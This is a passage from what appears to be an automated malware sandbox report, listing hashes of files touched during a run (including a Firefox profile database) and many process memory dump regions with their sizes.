                                                              965824c4d30c6c93a8fb1a844720b28ffcad34bf

                                                              SHA256

                                                              61fd36d77da410802cf59a9345c6891262b7c96f7ee87fd10a1b29b56fb05867

                                                              SHA512

                                                              b53b7722da6879c9f54c12032e1c1026e60586833f13155db68c90e0f36258c5324beb09cd7a3521c18194df254bec67196ee9682fa985ff046bf5b10d9db51e

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                              Filesize

                                                              2.5MB

                                                              MD5

                                                              5fd3e36064761055319728c7c42611fd

                                                              SHA1

                                                              02e7ebd28ef9b203c7f85c2c218054c7fdb244d2

                                                              SHA256

                                                              2bb830af37579b701a0eb39d8484952948597734a9f82234ddc760da72e1e913

                                                              SHA512

                                                              fc5f44046be53809b95c1b4dee230981edbaec976c31081f066061099da66f6fe2e8811048f73989864c843527c1cdea1f8b932d800a54c1e51ad5cbe22bb47f

                                                            • \??\pipe\crashpad_5736_VLNNQGTKXUCHABSU

                                                              MD5

                                                              d41d8cd98f00b204e9800998ecf8427e

                                                              SHA1

                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                              SHA256

                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                              SHA512

                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                            • memory/896-95-0x0000021F1E6A0000-0x0000021F1E6C2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/896-111-0x0000021F1E700000-0x0000021F1E71A000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/896-112-0x0000021F1E610000-0x0000021F1E616000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/1352-81-0x0000000000850000-0x0000000000862000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/1352-82-0x0000000001010000-0x0000000001016000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/1616-8472-0x00007FF616460000-0x00007FF616F5F000-memory.dmp

                                                              Filesize

                                                              11.0MB

                                                            • memory/1616-9050-0x00007FF616460000-0x00007FF616F5F000-memory.dmp

                                                              Filesize

                                                              11.0MB

                                                            • memory/1988-41-0x0000000000771000-0x0000000000797000-memory.dmp

                                                              Filesize

                                                              152KB

                                                            • memory/1988-40-0x0000000004D90000-0x0000000004D91000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1988-37-0x0000000000770000-0x0000000000C1D000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                            • memory/1988-42-0x0000000000770000-0x0000000000C1D000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                            • memory/1988-46-0x0000000000770000-0x0000000000C1D000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                            • memory/2108-161-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-169-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-131-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-129-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-125-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-123-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-121-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-157-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-143-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-127-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-120-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-113-0x0000000000400000-0x0000000000472000-memory.dmp

                                                              Filesize

                                                              456KB

                                                            • memory/2108-135-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-3056-0x0000000005820000-0x000000000586C000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/2108-3055-0x00000000057F0000-0x000000000581C000-memory.dmp

                                                              Filesize

                                                              176KB

                                                            • memory/2108-8248-0x0000000006FA0000-0x0000000006FF0000-memory.dmp

                                                              Filesize

                                                              320KB

                                                            • memory/2108-137-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-139-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-3076-0x0000000005BF0000-0x0000000005CE2000-memory.dmp

                                                              Filesize

                                                              968KB

                                                            • memory/2108-141-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-145-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-147-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-149-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-8147-0x0000000005D50000-0x0000000005DB6000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/2108-151-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-153-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-155-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-159-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-163-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-165-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-167-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-133-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-8210-0x0000000006760000-0x0000000006D04000-memory.dmp

                                                              Filesize

                                                              5.6MB

                                                            • memory/2108-171-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-175-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-8229-0x0000000006290000-0x0000000006322000-memory.dmp

                                                              Filesize

                                                              584KB

                                                            • memory/2108-177-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-179-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-173-0x00000000056C0000-0x0000000005757000-memory.dmp

                                                              Filesize

                                                              604KB

                                                            • memory/2108-118-0x00000000056C0000-0x000000000575C000-memory.dmp

                                                              Filesize

                                                              624KB

                                                            • memory/2108-8247-0x0000000006F10000-0x0000000006F22000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/2260-3059-0x0000000000800000-0x0000000001449000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                            • memory/2260-62-0x0000000000800000-0x0000000001449000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                            • memory/2260-9643-0x0000000000800000-0x0000000001449000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                            • memory/2360-22-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-39-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-21-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-45-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-19-0x0000000000291000-0x00000000002BF000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/2360-18-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-44-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-43-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/2360-20-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/3476-2-0x0000000000E81000-0x0000000000EAF000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/3476-1-0x00000000776A4000-0x00000000776A6000-memory.dmp

                                                              Filesize

                                                              8KB

                                                            • memory/3476-0-0x0000000000E80000-0x0000000001323000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/3476-3-0x0000000000E80000-0x0000000001323000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/3476-17-0x0000000000E80000-0x0000000001323000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/3476-4-0x0000000000E80000-0x0000000001323000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5252-8649-0x00000240FBC40000-0x00000240FBC4A000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/5252-8811-0x00000240FBDD0000-0x00000240FBDD6000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/5252-8824-0x00000240FBDE0000-0x00000240FBDEA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/5252-8731-0x00000240FBDF0000-0x00000240FBE0A000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/5252-8642-0x00000240FBB60000-0x00000240FBB7C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/5252-8643-0x00000240FBB80000-0x00000240FBC35000-memory.dmp

                                                              Filesize

                                                              724KB

                                                            • memory/5252-8786-0x00000240FBDA0000-0x00000240FBDA8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/5252-8676-0x00000240FBD90000-0x00000240FBD9A000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/5252-8658-0x00000240FBDB0000-0x00000240FBDCC000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/5272-8171-0x0000000000DC0000-0x000000000145B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/5272-6175-0x0000000000DC0000-0x000000000145B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/5652-11581-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5652-11579-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5792-9227-0x00000000007B0000-0x0000000000A66000-memory.dmp

                                                              Filesize

                                                              2.7MB

                                                            • memory/5792-8240-0x00000000007B0000-0x0000000000A66000-memory.dmp

                                                              Filesize

                                                              2.7MB

                                                            • memory/5792-8242-0x00000000007B0000-0x0000000000A66000-memory.dmp

                                                              Filesize

                                                              2.7MB

                                                            • memory/5792-8243-0x00000000007B0000-0x0000000000A66000-memory.dmp

                                                              Filesize

                                                              2.7MB

                                                            • memory/5792-9230-0x00000000007B0000-0x0000000000A66000-memory.dmp

                                                              Filesize

                                                              2.7MB

                                                            • memory/5840-3074-0x0000000000880000-0x0000000000D1B000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5840-8162-0x0000000000880000-0x0000000000D1B000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5840-8209-0x0000000000880000-0x0000000000D1B000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/6652-8269-0x00007FF7098F0000-0x00007FF70A3EF000-memory.dmp

                                                              Filesize

                                                              11.0MB

                                                            • memory/6652-8207-0x00007FF7098F0000-0x00007FF70A3EF000-memory.dmp

                                                              Filesize

                                                              11.0MB

                                                            • memory/7072-9244-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/7072-9242-0x0000000000290000-0x0000000000733000-memory.dmp

                                                              Filesize

                                                              4.6MB